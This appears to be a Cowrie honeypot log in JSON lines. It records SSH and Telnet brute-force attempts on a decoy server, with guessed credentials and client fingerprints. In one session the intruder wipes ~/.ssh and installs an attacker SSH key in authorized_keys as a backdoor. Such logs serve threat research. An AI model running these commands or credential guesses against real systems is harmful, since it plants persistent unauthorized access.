{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:46:23.446402Z","src_ip":"36.89.28.139","session":"36a4c5586346"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:46:23.636026Z","src_ip":"36.89.28.139","session":"36a4c5586346"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:46:24.433543Z","src_ip":"36.89.28.139","session":"36a4c5586346"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:25.625671Z","src_ip":"36.89.28.139","session":"36a4c5586346"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":37250,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc735facab50","protocol":"ssh","message":"New connection: 36.89.28.139:37250 (1.2.3.4:22) [session: fc735facab50]","sensor":"my-vps","timestamp":"2025-08-26T00:46:25.830163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:46:25.831374Z","src_ip":"36.89.28.139","session":"fc735facab50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:46:26.027766Z","src_ip":"36.89.28.139","session":"fc735facab50"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:46:26.875103Z","src_ip":"36.89.28.139","session":"fc735facab50"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:27.073248Z","src_ip":"36.89.28.139","session":"fc735facab50"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:27.080866Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":58972,"dst_ip":"1.2.3.4","dst_port":22,"session":"f27c15c41976","protocol":"ssh","message":"New connection: 45.159.112.103:58972 (1.2.3.4:22) [session: f27c15c41976]","sensor":"my-vps","timestamp":"2025-08-26T00:46:55.690442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:46:55.691524Z","src_ip":"45.159.112.103","session":"f27c15c41976"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:46:55.803501Z","src_ip":"45.159.112.103","session":"f27c15c41976"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":35304,"dst_ip":"1.2.3.4","dst_port":22,"session":"96da180c3a2a","protocol":"ssh","message":"New connection: 24.108.102.132:35304 (1.2.3.4:22) [session: 96da180c3a2a]","sensor":"my-vps","timestamp":"2025-08-26T00:46:55.849166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:46:55.860240Z","src_ip":"24.108.102.132","session":"96da180c3a2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:46:56.027897Z","src_ip":"24.108.102.132","session":"96da180c3a2a"}
{"eventid":"cowrie.login.failed","username":"mine","password":"123456","message":"login attempt [mine/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:46:56.295284Z","src_ip":"45.159.112.103","session":"f27c15c41976"}
{"eventid":"cowrie.login.failed","username":"test","password":"123qwe","message":"login attempt [test/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T00:46:56.681811Z","src_ip":"24.108.102.132","session":"96da180c3a2a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:57.408939Z","src_ip":"45.159.112.103","session":"f27c15c41976"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:57.850156Z","src_ip":"24.108.102.132","session":"96da180c3a2a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":56012,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7eefaaf7255","protocol":"ssh","message":"New connection: 27.112.78.170:56012 (1.2.3.4:22) [session: b7eefaaf7255]","sensor":"my-vps","timestamp":"2025-08-26T00:46:59.038795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:46:59.039514Z","src_ip":"27.112.78.170","session":"b7eefaaf7255"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:46:59.313989Z","src_ip":"27.112.78.170","session":"b7eefaaf7255"}
{"eventid":"cowrie.login.failed","username":"reza","password":"reza","message":"login attempt [reza/reza] failed","sensor":"my-vps","timestamp":"2025-08-26T00:47:00.426176Z","src_ip":"27.112.78.170","session":"b7eefaaf7255"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:47:01.696680Z","src_ip":"27.112.78.170","session":"b7eefaaf7255"}
{"eventid":"cowrie.session.connect","src_ip":"111.255.213.146","src_port":37901,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b310fdfb06b","protocol":"telnet","message":"New connection: 111.255.213.146:37901 (1.2.3.4:23) [session: 0b310fdfb06b]","sensor":"my-vps","timestamp":"2025-08-26T00:47:26.259253Z"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":35670,"dst_ip":"1.2.3.4","dst_port":22,"session":"25c96c7c2178","protocol":"ssh","message":"New connection: 36.89.28.139:35670 (1.2.3.4:22) [session: 25c96c7c2178]","sensor":"my-vps","timestamp":"2025-08-26T00:47:29.706761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:47:29.707650Z","src_ip":"36.89.28.139","session":"25c96c7c2178"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:47:29.894492Z","src_ip":"36.89.28.139","session":"25c96c7c2178"}
{"eventid":"cowrie.login.failed","username":"video","password":"video","message":"login attempt [video/video] failed","sensor":"my-vps","timestamp":"2025-08-26T00:47:31.212803Z","src_ip":"36.89.28.139","session":"25c96c7c2178"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:47:32.402210Z","src_ip":"36.89.28.139","session":"25c96c7c2178"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":52902,"dst_ip":"1.2.3.4","dst_port":22,"session":"481e7cbd9c9e","protocol":"ssh","message":"New connection: 45.159.112.103:52902 (1.2.3.4:22) [session: 481e7cbd9c9e]","sensor":"my-vps","timestamp":"2025-08-26T00:47:57.633519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:47:57.634210Z","src_ip":"45.159.112.103","session":"481e7cbd9c9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:47:57.741542Z","src_ip":"45.159.112.103","session":"481e7cbd9c9e"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":56410,"dst_ip":"1.2.3.4","dst_port":22,"session":"891948ccbfe5","protocol":"ssh","message":"New connection: 24.108.102.132:56410 (1.2.3.4:22) [session: 891948ccbfe5]","sensor":"my-vps","timestamp":"2025-08-26T00:47:58.076845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:47:58.087611Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.login.failed","username":"user","password":"asdf1234","message":"login attempt [user/asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T00:47:58.210980Z","src_ip":"45.159.112.103","session":"481e7cbd9c9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:47:58.255521Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.login.success","username":"root","password":"p","message":"login attempt [root/p] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:47:58.932326Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:47:59.315728Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:47:59.316404Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:47:59.317221Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:47:59.320899Z","src_ip":"45.159.112.103","session":"481e7cbd9c9e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:47:59.490382Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:47:59.880676Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:47:59.881324Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:48:00.049739Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:00.050722Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":56420,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6367577e215","protocol":"ssh","message":"New connection: 24.108.102.132:56420 (1.2.3.4:22) [session: a6367577e215]","sensor":"my-vps","timestamp":"2025-08-26T00:48:00.220525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:00.225870Z","src_ip":"24.108.102.132","session":"a6367577e215"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:00.399024Z","src_ip":"24.108.102.132","session":"a6367577e215"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:48:01.093920Z","src_ip":"24.108.102.132","session":"a6367577e215"}
